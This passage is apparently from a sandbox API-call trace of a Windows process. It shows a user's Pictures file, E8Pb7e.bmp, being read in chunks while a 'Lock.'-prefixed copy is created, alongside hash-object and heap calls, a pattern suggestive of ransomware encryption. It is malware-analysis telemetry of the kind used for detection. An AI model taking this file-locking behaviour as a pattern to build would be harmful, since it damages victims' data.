hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.711] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.711] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.711] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.711] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0209.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/E8Pb7e.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e8pb7e.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0209.713] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.713] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74358 [0209.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.714] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0209.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.E8Pb7e.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.e8pb7e.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0209.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0209.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0209.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0209.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e4020 [0209.720] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.720] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0xfbd8, lpOverlapped=0x0) returned 1 [0209.723] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbd8) returned 0x2aae878 [0209.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e4020 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbd8) returned 0x2abe458 [0209.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.728] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbd8) returned 0x2aae878 [0209.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0209.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.730] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0209.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbd8) returned 0x2aae878 [0209.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbd8) returned 0x2ace038 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0209.733] 